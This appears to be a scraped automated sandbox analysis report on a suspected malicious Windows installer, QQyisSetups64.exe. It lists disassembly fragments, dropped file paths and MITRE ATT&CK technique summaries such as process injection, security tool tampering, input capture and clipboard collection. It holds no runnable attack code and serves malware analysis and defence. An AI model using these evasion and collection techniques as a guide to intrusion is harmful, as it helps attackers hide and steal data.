Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Cursor$DestroyLoad$H_prolog3
String ID:
API String ID: 316482430-0
Opcode ID: 17415f71f64a451d11eeaf8acf90b54af9733c7f8774804006d7c004398c4add
Instruction ID: 8e08a887b0c242bc8908c433d16eb2521f36325c30baafff340ea2b9336f0e5f
Opcode Fuzzy Hash: 17415f71f64a451d11eeaf8acf90b54af9733c7f8774804006d7c004398c4add
Instruction Fuzzy Hash: DE2108B0905B449ED3609F7A88857DAFAE4BF59304F80896ED1EE87341CBB42544CB99

Function 6C652C27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30registryclipboardCOMMON

Download Yara Rule

APIs

RegisterClipboardFormatW.USER32(WM_HANDLE_ANIMATION_SNAPSHOT), ref: 6C652C41
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000002,00000000,00080000,00000000), ref: 6C652CB1

Strings

WM_HANDLE_ANIMATION_SNAPSHOT, xrefs: 6C652C3C

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: AttributesClipboardFormatLayeredRegisterWindow
String ID: WM_HANDLE_ANIMATION_SNAPSHOT
API String ID: 2623644469-593847780
Opcode ID: 30006d20d78cefa69122acef9ace707667c8b8893dc81a64ad48e0ada9aaf0da
Instruction ID: 2304dfdd95702b89face36ce390e5ee605ac5fd5113f342d6a8b1f35df9a0c6c
Opcode Fuzzy Hash: 30006d20d78cefa69122acef9ace707667c8b8893dc81a64ad48e0ada9aaf0da
Instruction Fuzzy Hash: 0DF0EDF2700200EFDF04AF59D9C9B99BBB4EB8576BF60402AF0028A542DB301C209B48

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QQyisSetups64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\360\360Safe\{7C836BE6-5ADF-472f-957C-1E161D0963A3}.tf

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user~1\AppData\Local\Temp\!@t97F6.tmp (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\PolicyManagement.xml

C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.P2P

Windows Analysis Report
QQyisSetups64.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre